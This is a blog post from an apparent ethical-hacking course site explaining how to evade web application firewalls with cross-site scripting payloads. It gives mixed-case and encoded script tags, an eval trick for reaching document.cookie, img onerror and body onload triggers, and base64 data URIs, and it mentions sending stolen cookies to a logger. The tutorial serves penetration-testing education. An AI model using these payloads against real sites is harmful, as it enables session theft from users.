• Courses

    About Courses

    Edit widget and choose a menu
    Android Studio Photo Editor Project

    Android Studio Photo Editor Project

    ₹14,000.00 ₹3,500.00
    Read More
  • Features
    • Membership
    • Portfolio
    • About Us
    • FAQs
    • Sidebar Shop
    • 404 Page
  • Events
  • Gallery
  • Blog
  • Contact
    Have any question?
    (00) 123 456 789
    hello@eduma.com
    RegisterLogin
    Job Oriented Security Courses
    • Courses

      About Courses

      Edit widget and choose a menu
      Android Studio Photo Editor Project

      Android Studio Photo Editor Project

      ₹14,000.00 ₹3,500.00
      Read More
    • Features
      • Membership
      • Portfolio
      • About Us
      • FAQs
      • Sidebar Shop
      • 404 Page
    • Events
    • Gallery
    • Blog
    • Contact

      Blog

      • Home
      • Blog
      • Blog
      • How to Bypass Web Application Firewall to Execute Cross Site Scripting

      How to Bypass Web Application Firewall to Execute Cross Site Scripting

      • Posted by CiuLabs
      • Categories Blog, Ethical Hacking
      • Date January 11, 2022
      • Comments 0 comment

      Due to the wide awareness among the developer community regarding Cross-Site Scripting vulnerabilities, at many places, a web application firewall, will be analyzing the user input, and sanitize it, and then pass it to the server.

      So, in the present-day scenario, the knowledge of Cross-Site Scripting as well as bypassing (evading) WAFs is very crucial.

      Here are some of the ways, in which one can bypass most of the web application firewalls Firewalls have their rules defined, and they will look for “certain” keywords while checking the input. Of course, they will be blocking the script tag, but one could use a change of capitalization to bypass them, eg sCrIpt.

      In web pages that have a text box, using an input tag, with the code

      <input type=’text’ name=’input’ value=’’ >

      We need to first jump out of the input tag to get our code executed. For that, first of all, we have to close the input tag with a closing bracket, and then write our script tag.

      Here is one example, with our string as “><script>alert(“xss”)</script>

      <input type=’text’ name=’input’ value=’”><script>alert(“xss”)</script>’ >

      At places, where the web masters have used add_slashes() to protect against common web application attacks, we need to convert the text into ASCII to get it alerted.

      Converting XSS to ASCII, we have its value as 88,83,83. So our final query would be

      ”><script>alert(String.fromCharCode(88,83,83))</script>

      While I was conducting penetration tests on some of my clients, I noticed that, since they needed users to enter HTML on their website, to prevent XSS attacks, they stripped out certain specific words that were generally used in XSS attacks. The words filtered were document, cookie, onmouseover and so on.

      So, I needed a workaround for this, to get the user’s cookies and perform all other operations. On further investigation, I found out that they had forgotten to block one important keyword in JavaScript, which is the eval keyword.

      Eval tag in Javascript is for evaluation. So, I wrote up a simple query.

      var a = eval(‘documen’+’t.cooki’+’e’);

      and then set up the cookie logger to send to me the variable a Blocking “script” tags seems to be a possible solution to block XSS attacks, but it isn’t. There are a lot of other triggers in Javascript and HTML, which could be used, such as the BODY and IMG tags.

      <img src=javascript:alert(“XSS”) />

      <img src=”xyz.png” onerror=alert(“XSS”) >

      Since there is no image named xyz.png, it would throw an error, and the event defined for error will be triggered resulting in a successful exploitation

      <BODY onload=prompt(“XSS”)> : as soon as the BODY of the HTML page will be loaded, our XSS will be executed

      Filters can be bypassed by using Data URI’s. Data URI, defined by RFC 2397, is a smart way of embedding small files in line in HTML documents. Instead of linking to a file stored locally on the server, the file is provided within the URL itself as a base64-encoded string of data preceded by a mime-type.

      Syntax : data:[mediatype][;base64],data

      You could use the online converter for Base64

      (http://www.opinionatedgeek.com/dotnet/tools/base64encode/) and convert your XSS query to Base64.

      For example, say you have an attack vector : “><script>alert(“xss”)</script>

      The resulting Base64 string for this would be

      Ij48c2NyaXB0PmFsZXJ0KCJ4c3MiKTwvc2NyaXB0Pg==

      So, there are no fixed hard and fast rules to evade filters. One has to think, by trial and error, and review the code to see the possibilities.

      References :

      Image credits : http://users.ece.cmu.edu/~dbrumley/courses/18487-f10/files/web-xss-csrf.pdf

       

      Wireless And Web Pentesting

      Wireless and Web Pentesting

      Course Description Network Penetration Testing course for beginners taking you from wondering what hackers do to set up a lab, learning Kali Linux, and…

       
      Advance Ethical Hacking And Penetration Testing

      Advance Ethical Hacking and Penetration Testing

      Overview Ethical hacking is an extremely valuable job skill that the more applications, the more website, the more software that is created, the more…

       
      Ethical Hacking And Penetration Testing

      Ethical Hacking and Penetration Testing

      Overview Ethical hacking is an extremely valuable job skill that the more applications, the more website, the more software that is created, the more…

       
      Advanced Python Scripting For Ethical Hackers

      Advanced Python Scripting for Ethical Hackers

      Many of the most powerful, memorable and effective photographs are black and white images. With digital photography though you can no longer take a…

       
      Network Pentesting

      Network Pentesting

      Course Description @ Network Pentesting course for beginners taking you from wondering what hackers do to set up a lab, learning Kali Linux, and…

       
      Proactive Cybersecurity For Individuals And Small Businesses

      Proactive Cybersecurity for Individuals and Small Businesses

      How You Can Protect Your Identity While Surfing Online, Starting Today…In This Step by Step Video Course While 99% of the population won’t do…

       
      Python For Ethical Hackers

      Python for Ethical Hackers

      Many of the most powerful, memorable and effective photographs are black and white images. With digital photography though you can no longer take a…

       
      Wireshark Network Analysis

      Wireshark Network Analysis

      Sass is completely compatible with all versions of CSS. We take this compatibility seriously, so that you can seamlessly use any available CSS libraries.

       
      Vulnerability Assessment

      Vulnerability Assessment

      Less is a CSS pre-processor, meaning that it extends the CSS language, adding features that allow variables, mixins, functions and many other techniques that…

      • Share:
      CiuLabs
      CiuLabs

      Previous post

      10 Free Traffic Methods That Still Work Today
      January 11, 2022

      Next post

      What is Cross-Site Scripting
      January 11, 2022

      You may also like

      Introduction to Wireshark Network Analysis
      29 January, 2022

      Get Access to more Free Videos on Wireshark or go for obtaining  Certificate in Wireshark  Hello and welcome to this wireshark tutorial series before we start digging deep down into all that technical stuff i would first like to give …

      30 Free Certifications to take Online
      23 January, 2022

      Free Online Certifications @  — Get your Free Online Certifications Certificate Immediately upon Successful Assessment – Start your Journey Today — Technology Incubation Center CIU is committed to promoting technology and higher education to every individual under the sun by its unique initiative of Free …

      What are Two Different Types of Denial of Service attacks
      11 January, 2022

      TYPES OF ATTACK SYN FLOOD : They are concept-based Denial of Service attacks and rely on the 3 way handshake, filling up a table known as the TCB. TCB or the Transmission Control Block is a transport protocol data structure that …

      Leave A Reply Cancel reply

      You must be logged in to post a comment.

      Search

      Categories

      • 2004 – 2006
      • 2006 – 2007
      • 2008 – 2010
      • 2010 – 2015
      • 2016 – 2021
      • Blog
      • Business Automation
      • CIU Alumni
      • Driving Internet Traffic
      • Ethical Hacking
      • Software and Technology
      Certificate in Ethical Hacking & Pentesting

      Certificate in Ethical Hacking & Pentesting

      ₹3,500.00
      Certificate in Advance Ethical Hacking

      Certificate in Advance Ethical Hacking

      ₹3,500.00
      Certificate in Linux App Development

      Certificate in Linux App Development

      ₹3,500.00
      (00) 123 456 789
      hello@eduma.com
      Facebook Twitter Google-plus Pinterest

      Company

      Edit widget and choose a menu

      Links

      Edit widget and choose a menu

      Support

      Edit widget and choose a menu

      Recommend

      Edit widget and choose a menu

      Education WordPress Theme by ThimPress. Powered by WordPress.

      • Privacy
      • Terms
      • Sitemap
      • Purchase

      Login with your site account

      Lost your password?

      Not a member yet? Register now

      Register a new account

      Are you a member? Login now